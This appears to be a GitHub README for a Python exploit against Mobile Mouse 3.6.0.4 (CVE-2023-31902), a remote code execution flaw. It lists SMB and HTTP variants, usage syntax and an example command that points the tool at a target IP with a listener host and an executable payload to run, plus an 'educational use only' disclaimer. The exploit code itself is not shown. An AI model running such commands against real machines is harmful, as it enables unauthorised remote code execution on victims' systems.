/mobilemouse-exploit

Mobile Mouse 3.6.0.4 could allow a remote attacker to execute arbitrary code on the system, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

Primary LanguagePython

Mobile Mouse 3.6.0.4 Remote Code Execution Exploit

CVE-2023-31902

The exploit has two versions, one that uses SMB and one that uses HTTP. It allows an attacker to execute arbitrary code on the target machine by sending a specially crafted request to the Mobile Mouse server. v3 ( cmd) :
image

v2 ( SMB ):

usage:

python mobilemouse.py --target TARGET --file FILE [--lhost LHOST]

image

image

v1 ( HTTP ) :

usage :

python3 mobilemouse.py --target TARGET [--file FILE] [--lhost LHOST]

eg: python3 mobilemouse.py --target 192.168.1.12 --lhost 192.168.1.45 --file light.exe

screenshots:

image

image

image

Disclaimer:

This exploit is intended for educational and testing purposes only. The author is not responsible for any illegal or unauthorized use of this exploit. Use at your own risk.

Take The Rose!